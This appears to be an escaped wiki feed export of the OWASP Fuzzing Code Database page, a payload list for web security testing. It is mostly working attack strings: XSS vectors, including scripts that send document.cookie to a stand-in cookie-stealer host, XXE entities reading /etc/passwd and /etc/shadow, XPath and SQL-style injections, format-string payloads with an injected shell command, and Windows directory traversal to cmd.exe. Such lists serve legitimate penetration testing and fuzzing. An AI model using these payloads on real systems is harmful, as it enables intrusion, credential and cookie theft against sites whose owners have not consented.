&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80072</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80072"/>
				<updated>2010-03-17T20:58:59Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* File Upload Filter Bypass   (Update: 17 March 2009 - notes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2009)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2009 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
